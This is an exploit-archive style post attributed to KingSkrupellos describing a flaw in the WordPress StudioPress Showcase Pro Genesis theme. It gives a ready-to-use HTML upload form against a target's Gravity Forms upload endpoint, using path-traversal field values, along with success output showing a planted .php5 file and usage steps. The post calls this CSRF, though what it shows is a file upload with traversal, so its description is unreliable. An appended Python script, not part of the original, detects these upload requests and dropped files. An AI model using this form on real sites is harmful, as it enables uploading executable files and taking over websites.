- ####################################################################
- # Exploit Title : WordPress StudioPress Showcase Pro Genesis Framework CSRF Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22/05/2019
- # Vendor Homepage : studiopress.com - gravityforms.com
- # Software Information Link : my.studiopress.com/themes/showcase/
- # Software Affected Versions : N/A
- # Software Price Type : Paid Download - 129.95 $
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- WordPress StudioPress Showcase Pro Genesis Framework is vulnerable to
- cross-site request forgery, caused by improper validation of user-supplied input.
- By persuading an authenticated user to visit a malicious Web site, a remote attacker
- could send a malformed HTTP request to perform unauthorized actions.
- An attacker could exploit this vulnerability to perform cross-site scripting
- attacks, Web cache poisoning, and other malicious activities.
- The web application does not, or cannot, sufficiently verify whether a well-formed,
- valid, consistent request was intentionally provided by the user who submitted the request.
- When a web server is designed to receive a request from a client without any mechanism
- for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
- client into making an unintentional request to the web server which will be treated as an
- authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
- can result in exposure of data or unintended code execution.
- ####################################################################
- # CSRF Cross Site Request Forgery Exploit :
- ****************************************
- <title>WordPress StudioPress Showcase Pro Genesis Framework Input Exploiter</title>
- <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
- <body background=" ">
- <input type="file" name="file" id="file"><br>
- <input name="form_id" value="../../../" type="hidden">
- <input name="name" value="kingskrupellos.html" type="hidden">
- <input name="gform_unique_id" value="../../" type="hidden">
- <input name="field_id" value="" type="hidden">
- <input type="submit" name="gform_submit" value="submit">
- </form>
- # Directory File Path :
- ***********************
- /_input__kingskrupellos.php5
- /_input__[YOURFILENAME].php5
- # Vulnerability Error :
- *******************
- {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
- # Vulnerability Error [ Successful ] :
- *******************************
- {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
- # Allowed File Extensions :
- *************************
- .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
- # Example Usage for Windows :
- ******************************
- # Use with XAMPP Control Panel and your Localhost.
- # Use from htdocs folder located in XAMPP
- # 127.0.0.1/wordpressshowcasegenesisframeworkexploiter.html
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
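A defender-side triage for the indicators this advisory names (POST requests to `?gf_page=upload` and `_input__` files with script extensions), as an added example that is not part of the original paste. The combined log format, the constructed sample lines, the function names and the choice of which listed extensions count as executable are assumptions.

```python
import re
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Subset of the advisory's extension list that a PHP handler may execute
# (assumption: the exact mapping depends on the server configuration).
SCRIPT_EXTS = {".php", ".php2", ".php5", ".phtml"}

# Assumes Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/May/2019:10:01:02 +0000] "POST /?gf_page=upload HTTP/1.1" 200 131 "-" "-"',
    '198.51.100.4 - - [22/May/2019:10:01:05 +0000] "GET /?gf_page=upload HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.9 - - [22/May/2019:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"',
]

def upload_posts(lines):
    """Return (ip, timestamp, status) for each POST to the gf_page=upload endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        query = parse_qs(urlsplit(m["uri"]).query)
        if "upload" in query.get("gf_page", []):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits

def dropped_scripts(web_root):
    """Return files under web_root named _input__* that carry a script extension."""
    return sorted(
        p for p in Path(web_root).rglob("_input__*")
        if p.is_file() and p.suffix.lower() in SCRIPT_EXTS
    )

if __name__ == "__main__":
    import sys
    for hit in upload_posts(SAMPLE_LOG):
        print("POST to upload endpoint:", hit)
    for path in dropped_scripts(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("review:", path)
```

Run it with the site's document root as the first argument; a hit from either function is a lead for review, not proof of compromise.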